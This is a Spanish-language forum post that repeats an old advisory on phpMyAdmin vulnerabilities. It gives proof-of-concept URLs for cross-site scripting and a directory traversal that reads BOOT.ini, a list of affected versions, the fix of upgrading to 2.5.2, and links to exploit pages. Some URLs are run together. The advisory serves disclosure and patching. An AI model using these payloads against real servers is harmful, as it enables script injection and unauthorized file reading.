Pues como no nos das la version (ni de MySQL, ni de PHP, ni de phpMyAdmin...
17)
—————————————————-
-Vulnerabilidades en el phpMyAdmin -
—————————————————-
Multiples vulnerabilidades han sido detectadas en el phpMyAdmin, las cuales permitirian a un atacante ejecutar codigo y acceder a información sensible.
ejemplos de las vulnerabilidades:
1. Cross site scripting y muestra del path
2. Directorio tranversal
3. Información sin coding: solo guarda los usuarios y las claves en texto plano.
ejemplos:
http://localhost/mysql/sql.php?sql_query=">..<h1>XSS ! Oh my God!</h1>
http://localhost/mysql/db_datadict.php?db=XSShttp://localhost/mysql/db_details_importdocsql.php?submit_show=true&do=import&docpath=../../../BOOT.inihttp://localhost/mysql/read_dump.php?db=nonexistent&sql_query="><h1>XSS</h1>
http://localhost/mysql/tbl_properties_links.php?table_info_num_rows=10&url_query="><h1>XSS
Versiones vulnerables:
Debian Linux 2.2 68k
Debian Linux 2.2 alpha
Debian Linux 2.2 arm
Debian Linux 2.2 powerpc
Debian Linux 2.2 sparc
FreeBSD FreeBSD 3.5.1
FreeBSD FreeBSD 4.2
MandrakeSoft Linux Mandrake 7
MandrakeSoft Linux Mandrake 7.1
MandrakeSoft Linux Mandrake 7.2
OpenBSD OpenBSD 2.6
OpenBSD OpenBSD 2.7
OpenBSD OpenBSD 2.8
PhpMyAdmin PhpMyAdmin 2.0
PhpMyAdmin PhpMyAdmin 2.0.1
PhpMyAdmin PhpMyAdmin 2.0.2
PhpMyAdmin PhpMyAdmin 2.0.3
PhpMyAdmin PhpMyAdmin 2.0.4
PhpMyAdmin PhpMyAdmin 2.0.5
PhpMyAdmin PhpMyAdmin 2.1
PhpMyAdmin PhpMyAdmin 2.1.1
PhpMyAdmin PhpMyAdmin 2.1.2
PhpMyAdmin PhpMyAdmin 2.2.2
PhpMyAdmin PhpMyAdmin 2.2.3
PhpMyAdmin PhpMyAdmin 2.2.4
PhpMyAdmin PhpMyAdmin 2.2.5
PhpMyAdmin PhpMyAdmin 2.2.6
PhpMyAdmin PhpMyAdmin 2.3.1
PhpMyAdmin PhpMyAdmin 2.3.2
PhpMyAdmin PhpMyAdmin 2.4.0
PhpMyAdmin PhpMyAdmin 2.5.0
PhpMyAdmin PhpMyAdmin 2.5.1
RedHat Linux 6.2
RedHat Linux 7.0
S.u.S.E. Linux 6.4
S.u.S.E. Linux 7
S.u.S.E. Linux 7.1
Sun Solaris 2.6
Sun Solaris 2.6 _x86
Sun Solaris 7.0
Sun Solaris 7.0 _x86
Sun Solaris 8.0
Sun Solaris 8.0 _x86
Solución:
La solución es instalar la version phpMyAdmin 2.5.2 , la cual contiene
los fixes correspondientes.
:http://milw0rm.com/video/watch.php?id=90
:http://milw0rm.com/exploits/7382
:http://milw0rm.com/exploits/1244
:http://milw0rm.com/exploits/309